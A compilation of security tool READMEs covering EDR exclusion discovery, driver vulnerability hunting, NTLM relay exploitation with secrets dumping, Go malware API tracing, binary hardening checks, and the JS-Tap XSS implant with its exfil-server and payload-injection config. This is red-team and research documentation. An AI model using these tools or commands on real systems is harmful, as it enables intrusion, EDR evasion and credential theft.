BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe on the same folder of BadExclusionsNWBO.exe.

Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less means folder has an exclusion otherwise the folder is not excluded.


Original idea?

Since the release of BadExclusions I've been thinking on how to achieve the same results without creating that many noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.

If you download Probatorum-EDR-Userland-Hook-Checker and you run it inside a regular folder and on folder with an specific type of exclusion you will notice a huge difference. All the information is on the Probatorum repository.

Requirements

Each vendor apply exclusions on a different way. In order to get the list of folder exclusions an specific type of exclusion should be made. Not all types of exclusion and not all the vendors remove the hooks when they exclude a folder.

The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.

EDR Demo

https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4



Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

Description

Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknow n ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


Features

Target Vulnerability Types

  • map physical memory
  • controllable process handle
  • buffer overflow
  • null pointer dereference
  • read/write controllable address
  • arbitrary shellcode execution
  • arbitrary wrmsr
  • arbitrary out
  • dangerous file operation

Optional Customizations

  • length limit
  • loop bound
  • total timeout
  • IoControlCode timeout
  • recursion
  • symbolize data section

Build

Docker (Recommand)

docker build .

Local

dpkg --add-architecture i386
apt-get update
apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
libffi-dev libxslt1-dev libxml2-dev

pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

Analysis

# python3 analysis/ioctlance.py -h
usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
[-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
path

positional arguments:
path dir (including subdirectory) or file path to the driver(s) to analyze

optional arguments:
-h, --help show this help message and exit
-i IOCTLCODE, --ioctlcode IOCTLCODE
analyze specified IoControlCode (e.g. 22201c)
-T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
-t TIMEOUT, --timeout TIMEOUT
timeout for analyze each IoControlCode (default 40, 0 to unlimited)
-l LENGTH, --length LENGTH
the limit of number of instructions for technique L engthLimiter (default 0, 0
to unlimited)
-b BOUND, --bound BOUND
the bound for technique LoopSeer (default 0, 0 to unlimited)
-g GLOBAL_VAR, --global_var GLOBAL_VAR
symbolize how many bytes in .data section (default 0 hex)
-a ADDRESS, --address ADDRESS
address of ioctl handler to directly start hunting with blank state (e.g.
140005c20)
-e EXCLUDE, --exclude EXCLUDE
exclude function address split with , (e.g. 140005c20,140006c20)
-o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
-r, --recursion do not kill state if detecting recursion (default False)
-c, --complete get complete base state (default False)
-d, --debug print debug info while analyzing (default False)

Evaluation

# python3 evaluation/statistics.py -h
usage: statistics.py [-h] [-w] path

positional arguments:
path target dir or file path

optional arguments:
-h, --help show this help message and exit
-w, --wdm copy the wdm drivers into <path>/wdm

Test

  1. Compile the testing examples in test to generate testing driver files.
  2. Run IOCTLance against the drvier files.

Reference



NTLM Relay Gat - Powerful Tool Designed To Automate The Exploitation Of NTLM Relays


NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.


Features

  • Multi-threading Support: Utilize multiple threads to perform actions concurrently.
  • SMB Shares Enumeration: List available SMB shares.
  • SMB Shell Execution: Execute a shell via SMB.
  • Secrets Dumping: Dump secrets from the target.
  • MSSQL Database Enumeration: List available MSSQL databases.
  • MSSQL Command Execution: Execute operating system commands via xp_cmdshell or start SQL Server Agent jobs.

Prerequisites

Before you begin, ensure you have met the following requirements:

  • proxychains properly configured with ntlmrelayx SOCKS relay port
  • Python 3.6+

Installation

To install NTLM Relay Gat, follow these steps:

  1. Ensure that Python 3.6 or higher is installed on your system.

  2. Clone NTLM Relay Gat repository:

git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
  1. Install dependencies, if you don't have them installed already:
pip install -r requirements.txt

NTLM Relay Gat is now installed and ready to use.

Usage

To use NTLM Relay Gat, make sure you've got relayed sessions in ntlmrelayx.py's socks command output and that you have proxychains configured to use ntlmrelayx.py's proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:

# List available SMB shares using 10 threads
python ntlm_relay_gat.py --smb-shares -t 10

# Execute a shell via SMB
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell

# Dump secrets from the target
python ntlm_relay_gat.py --dump-secrets

# List available MSSQL databases
python ntlm_relay_gat.py --mssql-dbs

# Execute an operating system command via xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'

Disclaimer

NTLM Relay Gat is intended for educational and ethical penetration testing purposes only. Usage of NTLM Relay Gat for attacking targets without prior mutual consent is illegal. The developers of NTLM Relay Gat assume no liability and are not responsible for any misuse or damage caused by this tool.

License

This project is licensed under the MIT License - see the LICENSE file for details.



Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries


A command line Windows API tracing tool for Golang binaries.

Note: This tool is a PoC and a work-in-progress prototype so please treat it as such. Feedbacks are always welcome!


How it works?

Although Golang programs contains a lot of nuances regarding the way they are built and their behavior in runtime they still need to interact with the OS layer and that means at some point they do need to call functions from the Windows API.

The Go runtime package contains a function called asmstdcall and this function is a kind of "gateway" used to interact with the Windows API. Since it's expected this function to call the Windows API functions we can assume it needs to have access to information such as the address of the function and it's parameters, and this is where things start to get more interesting.

Asmstdcall receives a single parameter which is pointer to something similar to the following structure:

struct LIBCALL {
DWORD_PTR Addr;
DWORD Argc;
DWORD_PTR Argv;
DWORD_PTR ReturnValue;

[...]
}

Some of these fields are filled after the API function is called, like the return value, others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless when those are set it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

The gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log it to the user. The tool is capable of log the function name, it's parameters and also the return value of each Windows function called by a Golang application. All of it with no need to hook a single API function or have a signature for it.

The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

If you want to know more about this project and research check the blogpost.

Installation

Download the latest release.

Usage

  1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
  2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
  3. Run gftrace.exe passing the target Golang program path as a parameter.
gftrace.exe <filepath> <params>

Configuration

All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating it by comma with no spaces:

CreateFileW,ReadFile,CreateProcessW

The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analysis of the method itself or trying to guess it. There's some interesting characteristics that can be used to determine it, for example, Golang applications seems to always prefer to call functions from the "Wide" and "Ex" set (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc) so you can consider it during your analysis.

The default config file contains multiple functions in which I tested already (at least most part of them) and can say for sure they can be called by a Golang application at some point. I'll try to update it eventually.

Examples

Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)

Tracing CreateProcessW() in the TunnelFish malware:

- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

[...]

Tracing multiple functions in the Sunshuttle malware:

- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

[...]

Tracing multiple functions in the DeimosC2 framework agent:

- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57 )

[...]

Future features:

  • [x] Support inspection of 32 bits files.
  • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
  • [x] Add support to cmdline parameters for the target process
  • [ ] Send the tracing log output to a file by default to make it better to filter. Currently there's no separation between the target file and gftrace output. An alternative is redirect gftrace output to a file using the command line.

:warning: Warning

  • The tool inspects the target binary dynamically and it means the file being traced is executed. If you're inspecting a malware or an unknown software please make sure you do it in a controlled environment.
  • Golang programs can be very noisy depending the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise but after that it's up to the user to decide what functions are better to filter in each scenario.

License

The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.



HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems


HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)


Execute Scanning Example

Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.

python3 HardeningMeter.py -f /bin/cp -s

Installation Requirements

Before installing HardeningMeter, make sure your machine has the following: 1. readelf and file commands 2. python version 3 3. pip 4. tabulate

pip install tabulate

Install HardeningMeter

The very latest developments can be obtained via git.

Clone or download the project files (no compilation nor installation is required)

git clone https://github.com/OfriOuzan/HardeningMeter

Arguments

-f --file

Specify the files you want to scan, the argument can get more than one file seperated by spaces.

-d --directory

Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.

-e --external

Specify whether you want to add external checks (False by default).

-m --show_missing

Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.

-s --system

Specify if you want to scan the system hardening methods.

-c --csv_format'

Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

Results

HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

Notes

When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application


JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


Changelogs

Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

Demo

You can read the original blog post about JS-Tap here:
javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719

A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

Upgrade warning

I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

Introduction

JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload.

Make sure you review the configuration section below carefully before using on a publicly exposed server.

Data Collected

  • Client IP address, OS, Browser
  • User inputs (credentials, etc.)
  • URLs visited
  • Cookies (that don't have httponly flag set)
  • Local Storage
  • Session Storage
  • HTML code of pages visited (if feature enabled)
  • Screenshots of pages visited
  • Copy of Form Submissions
  • Copy of XHR API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body
  • Copy of Fetch API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body

Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently.

Operating Modes

The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.

Trap Mode

Trap mode is typically the mode you would use as a XSS payload. Execution of XSS payloads is often fleeting, the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.

Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully contine into the authenticated portions of the application inside the iframe trap.

A user refreshing the page will generally break/escape the iframe trap.

Implant Mode

Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

Installation and Start

Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

Example:

mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt

run in debug/single thread mode:
python3 jsTapServer.py

run with gunicorn multithreaded (production use):
./jstapRun.sh

A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

Note that on Mac I also had to install libmagic outside of python.

brew install libmagic

Playing with JS-Tap locally is fine, but to use in a proper engagment you'll need to be running JS-Tap on publicly accessible VPS and setup JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

Configuration

JS-Tap Server Configuration

Debug/Single thread config

If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

Proxy Mode

For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.

Data Directory

The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.

Server Port

To change the server port configuration see the last line of jsTapServer.py

app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

Gunicorn Production Configuration

Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself.

At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;

Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

telemlib.js Configuration

These configuration variables are in the initGlobals() function.

JS-Tap Server Location

You need to configure the payload with the URL of the JS-Tap server it will connect back to.

window.taperexfilServer = "https://127.0.0.1:8444";

Mode

Set to either trap or implant This is set with the variable:

window.taperMode = "trap";
or
window.taperMode = "implant";

Trap Mode Starting Page

Only needed for trap mode. See explanation in Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.

window.taperstartingPage = "http://targetapp.com/somestartpage";

If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

window.taperstartingPage = window.location.href;

Client Tag

Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served, you can have multiple JS-Tap payloads configured with different modes, start pages, and clien tags.

This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Setup multiple payloads, each with the appropriate configuration for the application its being used against, and add a tag indicating which app the client is running.

window.taperTag = 'whatever';

Custom Payload Tasks

Used to set if clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings Let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.

window.taperTaskCheck        = true;
window.taperTaskCheckDelay = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop = 2000;

Exfiltrate HTML

true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

window.taperexfilHTML = true;

Copy Form Submissions

true/false setting on whether to intercept a copy of all form posts.

window.taperexfilFormSubmissions = true;

MonkeyPatch APIs

Enable monkeypatching of XHR and Fetch APIs. This works in trap mode. In implant mode, only Fetch APIs are monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Not that jQuery based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls.

window.monkeyPatchAPIs = true;

Screenshot after API calls

By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.

window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;

JS-Tap Portal

Login with the admin credentials provided by the server script on startup.

Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

Each client has an 'x' button (near the star button). This allows you to delete the session for that client, if they're sending junk or useless data, you can prevent that client from submitting future data.

When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issues, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.

Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

Custom Payloads

Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

To run a payload on a single client user the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

Tools

A few tools are included in the tools subdirectory.

clientSimulator.py

A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

At the top of the script is a numClients variable, set to how many clients you want to simulator. The script will spawn a thread for each, retrieve a client session, and send data in simulating a client.

numClients = 50

You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

apiServer = "https://127.0.0.1:8444"

JS-Tap run using gunicorn scales quite well.

MonkeyPatchApp

A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.

Run with:

python3 monkeyPatchLab.py

By default this will start the application running on:

https://127.0.0.1:8443

Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js

function injectPayload()
{
document.head.appendChild(Object.assign(document.createElement('script'),
{src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
}

formParser.py

Abandoned tool, is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.

You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

generateIntelReport.py

No longer working, used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons, most of it is stored in the datagbase with the exception of exfiltratred HTML code and screenshots.

Contact

@hoodoer
[email protected]



